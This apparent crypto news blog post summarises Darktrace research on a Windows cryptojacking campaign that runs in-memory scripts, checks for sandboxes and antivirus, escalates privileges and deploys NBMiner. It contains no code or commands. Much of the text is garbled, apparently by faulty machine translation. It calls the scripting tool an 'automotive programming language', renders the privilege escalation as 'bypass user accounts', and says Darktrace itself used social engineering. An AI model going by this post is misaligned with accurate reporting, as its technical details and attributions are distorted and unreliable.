Cybersecurity company Darktrace has identified a new crypto jacking campaign designed to bypass Windows’ defenders and deploy crypto mining software.
summary
- DarkTrace has identified crypto jacking campaigns targeting Windows systems.
- The campaign involves secretly deploying NBMINER to mine cryptocurrency.
The cryptojacking campaign, first identified in late July, includes a multi-stage infection chain that quietly hijacks the processing power of computers mining cryptocurrency.
Researchers say the campaign targets Windows-based systems by leveraging Microsoft’s built-in command line shell and scripting language.
These malicious scripts are designed to run directly in system memory (RAM), and as a result, traditional antivirus tools that normally rely on scanning files on the system’s hard drive cannot detect malicious processes.
The attacker then uses the automotive programming language. Automotive programming languages automate tasks, a Windows tool normally used by IT professionals, inject malicious loaders into legitimate Windows processes, download and run cryptocurrency mining programs without leaving any obvious traces on the system.
You might like it too: Servers over 800k are at risk as they are leveraging new cryptojack malware.
As an additional line of defense, the loader is programmed to perform a series of environmental checks, including scanning for signs of a sandbox environment and inspecting hosts of installed antivirus products.
Runs only if Windows Defender is the only active protection. Additionally, if an infected user account does not have administrative privileges, the program attempts to bypass user accounts to gain increased access.
Once these conditions are met, the program downloads and runs NBMINER. This is a well-known crypto mining tool that uses the graphics processing unit of a computer to mine cryptocurrencies such as Ravencoin (RVN) and Monero (XMR).
In this example, DarkTrace “we were able to use an autonomous response system to contain the attack by preventing devices from making outbound connections and blocking certain connections to suspicious endpoints.”
“Cryptocurrencies are becoming increasingly popular, as seen at the continued high ratings of global cryptocurrencies (almost 4 trillion USD at the time of writing), so threat actors continue to see crypto as a beneficial venture,” wrote a researcher at Darktrace.
In July, Darktrace used complex social engineering tactics that would make them pretend to be real companies to flag another campaign to trick users into downloading modified software that deploys cryptographic malware.
Unlike the aforementioned cryptojacking scheme, this approach was carried out by the ignorant victims themselves who believed they were targeting both Windows and MacOS systems and interacting with company insiders.
read more: US sanctions Russian citizens, Chinese companies support North Korea’s crypto scheme
Discover more from Earlybirds Invest
Subscribe to get the latest posts sent to your email.
